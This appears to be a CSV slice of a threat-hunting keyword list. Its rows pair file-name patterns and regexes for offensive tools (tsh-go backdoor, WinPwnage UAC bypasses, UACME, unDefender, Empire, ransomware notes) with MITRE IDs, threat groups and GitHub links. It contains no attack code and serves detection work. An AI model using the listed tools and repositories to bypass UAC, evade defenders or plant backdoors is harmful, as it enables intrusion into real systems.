"*\tshd_windows.go*",".{0,1000}\\tshd_windows\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","19434"
"*\tshd_windows_amd64.exe*",".{0,1000}\\tshd_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","19435"
"*\tStifle.exe*",".{0,1000}\\tStifle\.exe.{0,1000}","offensive_tool_keyword","Stifle",".NET Post-Exploitation Utility for Abusing Explicit Certificate Mappings in ADCS","T1550.003 - T1552.004 - T1606.002","TA0006 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/logangoins/Stifle","1","0","#content","N/A","7","2","140","9","2025-02-10T04:58:46Z","2025-02-08T06:13:43Z","19436"
"*\tstool.py*",".{0,1000}\\tstool\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","19437"
"*\tsunami.py*",".{0,1000}\\tsunami\.py.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19439"
"*\tsunami_warning.py*",".{0,1000}\\tsunami_warning\.py.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19440"
"*\TsunamiServer\agent\*",".{0,1000}\\TsunamiServer\\agent\\.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19441"
"*\TsunamiWave_x64.exe*",".{0,1000}\\TsunamiWave_x64\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19442"
"*\tun2socks.*",".{0,1000}\\tun2socks\..{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","19443"
"*\tun2socks-main*",".{0,1000}\\tun2socks\-main.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","19444"
"*\tun2socks-windows*",".{0,1000}\\tun2socks\-windows.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","19445"
"*\Tunnel Rat Control.exe*",".{0,1000}\\Tunnel\sRat\sControl\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19446"
"*\tunnel-socks5.py*",".{0,1000}\\tunnel\-socks5\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","19449"
"*\TunnelVision-main*",".{0,1000}\\TunnelVision\-main.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","19450"
"*\TunnelVisionVM.ova*",".{0,1000}\\TunnelVisionVM\.ova.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","19451"
"*\turbo-intruder-all.jar*",".{0,1000}\\turbo\-intruder\-all\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","19454"
"*\uac.py*",".{0,1000}\\uac\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19463"
"*\uac_bypass.py*",".{0,1000}\\uac_bypass\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","19464"
"*\uac_bypass.vbs*",".{0,1000}\\uac_bypass\.vbs.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","19465"
"*\uac_cmstp.py*",".{0,1000}\\uac_cmstp\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19466"
"*\uac_compmgmtlauncher.py*",".{0,1000}\\uac_compmgmtlauncher\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19467"
"*\uac_computerdefaults.py*",".{0,1000}\\uac_computerdefaults\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19468"
"*\uac_dll_cliconfg.py*",".{0,1000}\\uac_dll_cliconfg\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19469"
"*\uac_dll_mcx2prov.py*",".{0,1000}\\uac_dll_mcx2prov\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19470"
"*\uac_dll_migwiz.py*",".{0,1000}\\uac_dll_migwiz\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19471"
"*\uac_dll_sysprep.py*",".{0,1000}\\uac_dll_sysprep\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19472"
"*\uac_dotnet.py*",".{0,1000}\\uac_dotnet\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19473"
"*\uac_eventviewer.py*",".{0,1000}\\uac_eventviewer\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19474"
"*\uac_fodhelper.py*",".{0,1000}\\uac_fodhelper\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19475"
"*\uac_mockdir.py*",".{0,1000}\\uac_mockdir\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19476"
"*\uac_perfmon.py*",".{0,1000}\\uac_perfmon\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19477"
"*\uac_runas.py*",".{0,1000}\\uac_runas\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19478"
"*\uac_sdclt.py*",".{0,1000}\\uac_sdclt\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19479"
"*\uac_sdcltcontrol.py*",".{0,1000}\\uac_sdcltcontrol\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19480"
"*\uac_sdcltisolatedcommand.py*",".{0,1000}\\uac_sdcltisolatedcommand\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19481"
"*\uac_silentcleanup.py*",".{0,1000}\\uac_silentcleanup\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19482"
"*\uac_slui.py*",".{0,1000}\\uac_slui\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19483"
"*\uac_token_manipulation.py*",".{0,1000}\\uac_token_manipulation\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19484"
"*\uac_wsreset.py*",".{0,1000}\\uac_wsreset\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","19485"
"*\UACBypass.dll*",".{0,1000}\\UACBypass\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19486"
"*\UAC-Bypass.ps1*",".{0,1000}\\UAC\-Bypass\.ps1.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","N/A","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","19487"
"*\UACBypassedService*",".{0,1000}\\UACBypassedService.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","19488"
"*\UACBypassTest.txt*",".{0,1000}\\UACBypassTest\.txt.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","19489"
"*\UACBypassTest.txt*",".{0,1000}\\UACBypassTest\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19490"
"*\UacInfo64.exe*",".{0,1000}\\UacInfo64\.exe.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","19491"
"*\UACME-*.zip*",".{0,1000}\\UACME\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","19492"
"*\UAC-TokenMagic.ps1*",".{0,1000}\\UAC\-TokenMagic\.ps1.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","19493"
"*\uberfile.py*",".{0,1000}\\uberfile\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","19494"
"*\UefiShell.iso*",".{0,1000}\\UefiShell\.iso.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","19495"
"*\UnconstrainedDelegationCheck .ahk*",".{0,1000}\\UnconstrainedDelegationCheck\s\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","19498"
"*\UnconstrainedDelegationCheck.ahk*",".{0,1000}\\UnconstrainedDelegationCheck\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","19499"
"*\unDefender.exe*",".{0,1000}\\unDefender\.exe.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","N/A","10","4","358","81","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z","19500"
"*\UnhookingPatch\bin2mac.py*",".{0,1000}\\UnhookingPatch\\bin2mac\.py.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","19501"
"*\UnhookNTDLL.ahk*",".{0,1000}\\UnhookNTDLL\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","19502"
"*\unlock your files.lnk*",".{0,1000}\\unlock\syour\sfiles\.lnk.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","19511"
"*\UNLOCK_FILES.*.HTML*",".{0,1000}\\UNLOCK_FILES\..{0,1000}\.HTML.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","19512"
"*\UNLOCK_MY_FILES.txt*",".{0,1000}\\UNLOCK_MY_FILES\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","19513"
"*\UnmanagedPowerShell.cpp*",".{0,1000}\\UnmanagedPowerShell\.cpp.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","19518"
"*\UnmanagedPowerShell.exe*",".{0,1000}\\UnmanagedPowerShell\.exe.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","19519"
